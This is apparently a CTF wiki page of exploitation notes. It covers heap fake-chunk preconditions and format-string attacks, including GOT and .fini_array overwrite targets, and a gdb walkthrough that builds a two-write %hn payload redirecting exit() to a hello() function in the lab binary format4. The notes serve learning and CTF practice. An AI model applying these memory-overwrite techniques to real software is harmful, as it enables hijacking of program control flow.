Pwn - adeptex/CTF GitHub Wiki
Heap Exploitation
struct chunk {
size_t prev_size;
size_t size;
struct chunk *fd;
struct chunk *bck;
char buf[0x10];
};
- The attacker can control a location of memory higher than the one he’s trying to change: the exact location depends on the fake size of the chunk we’re free-ing (see third point)
- A stack overflow that allows to overwrite a variable containing a chunk address returned by a malloc() call
- The aforementioned chunk is freed
- Another chunk is allocated
- The attacker can control the content of this last chunk
- Example
Format Strings
Write UNSIGNED INTEGER VALUE to OFFSET: %VALUEu%OFFSET$n --> %1234u%420$n
Write NUMBER OF CHARACTERS to OFFSET: %CHARSx%OFFSET$n
Things to look for:
- Stack based:
--- Return address
--- Function pointers
- Binary based:
--- GOT
----- readelf --relocs fmt.bin
----- gdb$ p system
------- write system addr to printf addr for example
------- RELRO must not be FULL
--- DTORS
----- objdump -h -j .fini_array fmt.bin
------- write to VMA
------- RELRO must be DISABLED
# rewrite exit() call @ 0x08049724 with 0x080484b4 in two short writes
(gdb) shell objdump -t format4 | grep hello
080484b4 g F .text 0000001e hello
(gdb) shell echo `python -c 'print "\x24\x97\x04\x08" + "\x26\x97\x04\x08"'` > /tmp/a
(gdb) p 0x0804 - 8
$2 = 2044
(gdb) shell echo `python -c 'print "\x24\x97\x04\x08" + "\x26\x97\x04\x08" + "%2044u%5$hn"'` > /tmp/a
(gdb) p 0x84b4 - 0x0804
$3 = 31920
(gdb) shell echo `python -c 'print "\x24\x97\x04\x08" + "\x26\x97\x04\x08" + "%2044u%5$hn" + "%31920u%4$hn"'` > /tmp/a
(gdb) r < /tmp/a